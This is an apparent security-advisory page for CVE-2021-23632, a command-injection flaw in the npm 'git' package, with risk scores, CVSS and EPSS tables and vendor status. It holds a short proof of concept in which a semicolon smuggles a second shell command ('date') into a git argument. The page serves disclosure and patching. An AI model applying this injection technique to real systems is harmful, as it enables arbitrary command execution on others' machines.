GHSA-9gqr-xp86-f87h · Severity: medium · Ecosystem: npm — Code injection in npm git
All versions of package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method, which allows execution of OS commands rather than just git commands. Steps to Reproduce 1. Create a file named exploit.js with the following content: js var Git = require("git").Git; var repo = new Git("repo-test"); var user_input = "version; date"; repo.git(user_input, function(err, result) { console.log(result); }) 2. In the same directory as exploit.js, run npm install git. 3. Run exploit.js: node exploit.js. You should see the outputs of both the git version and date command-lines. Note that the repo-test Git repository does not need to be present to make this PoC work.
Conclusion & alert: CVE-2021-23632 is rated High Exploit Risk (68.2/100): CVSS Medium severity, with medium exploitation likelihood (EPSS 2.20%). Core evidence: 1 public exploit reference(s) are indexed (Exploit-DB). Mandatory action: Public exploits are available—assess exposure, apply mitigations, and prioritize patching.
Risk is dynamic; we continuously reassess and refresh what is shown on this page as upstream context changes.
| EDB-ID | Source | Kind | Published | Link |
|---|---|---|---|---|
| — | nvd_ref | exploit_tag | Exploit-DB ↗ |
EPSS lead: Daily EPSS estimates relative likelihood of exploitation; percentile ranks this CVE among scored vulnerabilities (higher = more severe relative rank).
| # | Date | Old EPSS score | New EPSS score | Delta (New - Old) |
|---|---|---|---|---|
| 1 | 2026-06-15 | 3.40% | 2.20% | -1.20% |
| 2 | 2026-03-15 | 3.22% | 3.40% | +0.18% |
| 3 | 2025-04-13 | — | 3.22% | — |
Full EPSS history (17 records total)
CVSS metrics for this CVE.
| Base score | Version | Severity | Vector | Exploitability | Impact | Score source |
|---|---|---|---|---|---|---|
| 6.6 | 3.1 | MEDIUM |
|
0.7 | 5.9 | [email protected] |
| 9.8 | 3.1 | CRITICAL |
|
3.9 | 5.9 | [email protected] |
| 7.5 | 2.0 | HIGH |
|
10.0 | 6.4 | [email protected] |
GHSA-9gqr-xp86-f87h · Severity: medium · Ecosystem: npm — Code injection in npm git
| vendor | priority | summary | link |
|---|---|---|---|
ubuntu
|
medium | CVE-2021-23632 medium priority: Ubuntu including 1 source packages (git), 7 status rows across 7 suites (bionic, focal, impish, jammy, trusty, upstream, xenial): not-affected 6, ignored 1. | https://ubuntu.com/security/CVE-2021-23632 |
| Vendor | Product | Version | Raw CPE |
|---|---|---|---|
| git_project | git | <= 0.1.5 | cpe:2.3:a:git_project:git:*:*:*:*:*:node.js:*:* |
| URL | Tags |
|---|---|
| https://snyk.io/vuln/SNYK-JS-GIT-1568518 | Exploit Third Party Advisory |